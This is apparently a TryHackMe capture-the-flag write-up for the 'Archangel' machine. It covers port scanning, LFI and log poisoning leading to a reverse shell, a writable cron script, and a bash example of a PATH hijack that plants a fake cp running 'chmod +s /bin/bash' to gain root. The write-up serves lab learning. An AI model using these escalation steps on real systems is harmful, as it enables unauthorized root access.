Archangel


Last updated 1 year ago

Lab Setup

mkdir ~/Documents/TryHackMe/archangel
cd ~/Documents/TryHackMe/archangel
mkdir recon enumeration notes
touch notes/{README.md,vulns,creds}

export IP=10.10.8.234

Enumeration

First let's scan the machine for open ports. I usually do this with nmap. The third command (the -sS SYN scan) needs raw sockets, so it has to run as root.

nmap -Pn -p- -v -T4 --max-retries 5 $IP -oN recon/nmap.init
# pull the open port numbers out of the first scan into a comma-separated list
grep -E '^[0-9]+/tcp +open' recon/nmap.init | cut -d '/' -f 1 | paste -sd, > recon/ports
# the SYN scan (-sS) needs raw sockets, so this one runs as root
sudo nmap -Pn -sS -sV -n -v -A -T4 -p "$(cat recon/ports)" "$IP" -oN recon/nmap.alltcp

This takes a while, so in the meantime I use rustscan for a quick first pass.

rustscan -a $IP --ulimit 5000 -- -sC -sV -v -oN recon/rustscan.init

Found a domain -> mafialive.thm

If you work through the room's questions in order, this machine is quite easy. Let's add the domain to /etc/hosts.

Next, I enumerate the domain I found with dirsearch and feroxbuster, and do subdomain (virtual host) enumeration with wfuzz.
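The hosts entry and the enumeration commands, as an added example that is not part of the original writeup. The wordlist paths, output file names and the wfuzz --hw filter value are assumptions; tune them to what the target actually returns.

```shell
#!/usr/bin/env bash
# Added example (not from the original writeup): idempotent hosts-file entry plus
# the directory and virtual-host enumeration the text describes. Wordlist paths,
# output file names and the --hw baseline are assumptions.

# Append "IP name" to a hosts file unless an entry for that name already exists.
# The hosts file is a parameter so the function can be tried on a scratch copy
# (on the box, run it as root to write /etc/hosts).
add_host() {
    local ip="$1" name="$2" hosts="${3:-/etc/hosts}"
    if grep -Eq "[[:space:]]${name}"'([[:space:]]|$)' "$hosts"; then
        return 0
    fi
    printf '%s\t%s\n' "$ip" "$name" >> "$hosts"
}

# Directory / file brute force with the two tools named in the writeup; php and
# txt are the usual extensions worth trying on a PHP site.
enum_dirs() {
    local url="$1"
    dirsearch -u "$url" -e php,txt -o enumeration/dirsearch.txt
    feroxbuster -u "$url" -w /usr/share/wordlists/dirb/common.txt \
        -x php,txt -o enumeration/feroxbuster.txt
}

# Virtual-host fuzzing: the Host header is fuzzed, not the URL path.
# --hw hides responses whose word count equals the default page's; run once
# without it to learn that number, then filter on it.
enum_vhosts() {
    local domain="$1" baseline_words="$2"
    wfuzz -c -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt \
        -u "http://${domain}" -H "Host: FUZZ.${domain}" --hw "$baseline_words"
}

# Usage on the box:
#   add_host "$IP" mafialive.thm
#   enum_dirs http://mafialive.thm
#   enum_vhosts mafialive.thm <baseline-word-count>
```

Any new virtual host wfuzz turns up also needs its own add_host line before you can browse it.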

As I said, all you need to do is enumerate in the order the questions ask for. If you open test.php and try some LFI payloads you will get some answers.

Now let's get access with an LFI-to-RCE technique. First I restart the machine, because the fuzzing generated a lot of log entries and the log content is too large to read comfortably.

So it is about the User-Agent. Let's exploit this by injecting a PHP payload into the User-Agent header (log poisoning).

Exploitation

After this, go back to the website and refresh the page that includes the log file, and you will get a reverse shell. Don't forget to start a listener first. I don't put the flags here; try the machine on your own.

Privilege Escalation

After a few minutes of enumeration I found an interesting file in the /opt directory. It is world-writable and it is executed every minute by a scheduled (cron) job running as the archangel user.

As you see, I tried a few payloads; the last one worked and now I am the archangel user. Now let's get root privileges.

After a while I got root. I found an ELF file (backup). Analyse it (strings is enough, or just run it) and you will see that it executes the following command:

cp /home/user/archangel/myfiles/* /opt/backupfiles

The cp command is called without an absolute path (/bin/cp), so you can hijack it: create an executable file named cp in archangel's home directory, prepend that directory to the PATH variable, and run backup. Because backup runs with root privileges, your cp runs as root too and you get root access.
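The PATH hijack described above, as an added example that is not the writeup's own code. The location of the backup binary and the payload are assumptions; the writeup says only that backup calls cp unqualified and that a cp placed in archangel's home directory does the job.

```shell
#!/usr/bin/env bash
# Added example (not from the original writeup): PATH hijack of a binary that
# calls "cp" without an absolute path. Backup's location and the payload are
# assumptions.

# Drop a fake "cp" into a directory we control. Whatever it contains runs with
# the privileges of the process that called cp, i.e. as root when backup is
# privileged. Arguments backup passes to cp are simply ignored.
plant_fake_cp() {
    local dir="$1" payload="$2"
    printf '#!/bin/bash\n%s\n' "$payload" > "$dir/cp"
    chmod +x "$dir/cp"
}

# Put our directory first in PATH so the lookup for "cp" hits ours before
# /bin/cp, then run the command that makes the unqualified cp call. The PATH
# change is scoped to that one command.
run_with_hijacked_path() {
    local dir="$1"; shift
    PATH="$dir:$PATH" "$@"
}

# Usage on the box (the payload gives a root shell when backup is SUID root):
#   plant_fake_cp /home/archangel 'chmod +s /bin/bash'
#   run_with_hijacked_path /home/archangel <path-to-backup>
#   bash -p
```

This only works because backup inherits the caller's PATH; a binary that resets PATH, or is run through sudo with secure_path, resolves cp to /bin/cp regardless of what you plant.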